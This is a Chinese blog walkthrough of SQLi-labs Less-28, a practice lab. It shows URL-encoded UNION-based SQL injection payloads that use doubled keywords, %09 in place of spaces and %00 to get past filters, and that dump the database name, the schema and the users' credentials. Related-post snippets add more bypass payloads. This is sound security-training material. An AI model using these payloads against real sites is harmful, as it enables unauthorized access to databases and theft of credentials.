SQL-labs的第28关——union和select被屏蔽 union联合查询攻击(Get)

已于 2023-08-04 16:14:17 修改
阅读量257 收藏 1
点赞数
文章标签: sql 数据库
于 2023-08-04 16:06:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132106740
版权

该关的空格、-和注释也被屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。

并且该关不返回错误,所以不使用?id=1\,而且也不使用报错注入。

一、判断闭合方式

输入语句

?id=1'

,返回页面如下:

a1567ed0bf4d56382520a5fce70dc7f1.png

我们猜测闭合符号是单引号,输入语句

?id=1';%00

,返回页面如下:

 

90cc349c461a8a4afafeb26564ed49b8.png

依然报错,这说明闭合符除了单引号之外还有其他的符号,我们输入

?id=1');%00

,返回页面如下:

31d84aab832bf95e34cfbdcc44418c43.png

所以闭合方式是单引号加括号。

二、寻找回显点

输入语句

?id=1')%09order%09by%093;%00

,返回页面如下:

646ebe8660a767c1eecc337cb02c6447.png

所以一共有3个返回位。

我们需要在这三个返回位中找到回显位,输入语句

?id=0')%09unionunion%09select%09select%0912,13,14;%00

,返回页面如下:

 

fb58266aaa120da4385f53aa844e7643.png

这说明第2和3个返回位是回显位。

三、查询数据库名、用户名、版本

输入语句

?id=0')%09unionunion%09select%09select%0911,concat('~',database(),'~',user()),version();%00

,返回页面如下:

db51f7abdb5202bcfa4e24f8aeecb153.png

四、查询数据表名

输入语句?

id=0')%09unionunion%09select%09select%0911,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database();%00

,返回页面如下:

0318b469b1c0c0cc11c6f4dc6ad48465.png

五、查询字段名

输入语句

?id=0')%09unionunion%09select%09select%0911,group_concat(column_name),12%09from%09information_schema.columns%09where%09table_name='users'%09and%09table_schema=database();%00

,返回页面如下:

479cd1dbafe77dcccee3d21ffe14c8f2.png

六、查询字段内容

输入语句

?id=0')%09unionunion%09select%09select%0911,group_concat(concat(id,'~',username,'~',password)),12%09from%09users;%00

,返回页面如下:

01dd3ac32d479fc005c0879691904664.png

到此打靶结束

 

Hacker-小胖锅
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
sqli-labs————Less-28
Fly_鹏程万里
05-16 1060
Less 28这一于之前的27没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
sqli-labs(28-28a)
qq_43579362的博客
02-15 1362
Less-28 1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'。 2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id...
sqli-labs/Less-28
m0_71299382的博客
11-20 327
sqli-labs第二十八a
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 877
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sql-labs】闯记录28~38详解
qq_43665434的博客
04-24 559
sql-labs】闯记录28~38 【less-28】过滤union%0aselect 测试流程 ?id=1') and%0a'1'=('1 #成功回显 ?id=1') and%0a'1'=('2 #会显失败 #测试回显字段 ?id=232323') %0aunion%0aselect%0a1,2,3%0aand%0a'1'=('1 #发现union%0aselect被过滤了 #于是混淆双写,成功绕过 ?id=232323') %0auniunion%0aselecton%0aselect
sql-labs技巧
03-01
SQL注入常用靶场的通技巧
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL-labs/less1通教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
SQL-labs的第28a——unionselect屏蔽 union联合查询攻击Get
qq_73393033的博客
08-04 90
这说明该网站有三个返回位。接下来我们看看这三个返回位中哪几个是回显位。由此我们可以知道第2和3个返回位是回显位。
sqli-labs(28)---原创原创自此一家
weixin_30437847的博客
05-29 664
0X01构造闭合 ’报错 )报错 其他不报错 那我们猜想是不是')的闭合 ?id=1')||('1')=('1 返回正确 那么好像猜对了 0X02爆表名 过滤了相连接的unionselect ?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('1')=('1 这里过滤了相连接的union select 那咋办呐? ...
sqli-labs通28-31
m0_62207170的博客
02-27 98
sqli-labs通28-31
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1356
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、unionselect 的绕过。
sqlilabs教程(21-30)
一个安全研究员
05-28 1924
less-21 此题的注入点还是再uname,不过这次uname别base64编码了,我们来看一下源码 首先来看一下这个危险字符过滤函数: 这个不是我们的重点,但是也是它导致我们在登陆界面不能进行注入。我们的重点放在后台代码对cookie中的uname的操作上: 可以看到,我们页面输出的uname的值实际上就是经过base64编码过后的username的值,如果他这里没有进行输入检...
sqli-labs 21-28
记录一些有用的东西
12-12 210
Less-21 1.直接用我们知道的用户名密码都为:admin的进行尝试,发现: 2.发现Cookie为:uname = YWRtaW4=说明对其进行了base64编码,那就编码看看:在线编码解码 YWRtaW4=就是admin,确实是base64编码,那就是说构造的语句也要进行base64编码。 还是在Cookie中构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #编码后 uname=YWRtaW4nIGFuZCB
pgbackrest 备份工具使用 postgresql
liyayou的博客
05-10 670
我们的备份策略基本是,1天1次完整备份,1个小时1次差异备份。注意:命令中postgres:postgres,是为了授权给postgres用户权限,而且最好是用postgres用户,不然会遇到很多操作报无权限【因为postgresql在安装初始化的时候就自动创建了一个系统用户postgres,默认使用的也是postgres】#加上 --delta ,pgBackRest 自动确定数据库集群目录中的哪些文件可以保留,哪些文件需要从备份中恢复 — 它还会删除备份清单中不存在的文件,以便处理不同的更改。
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause
超哥的博客
05-10 72
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause279.1 现象描述279.2 优化说明 openGauss学习笔记-279 open
Oracle数据库之PL/SQL基本语法(八)
最新发布
pursue_mony的博客
05-14 110
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值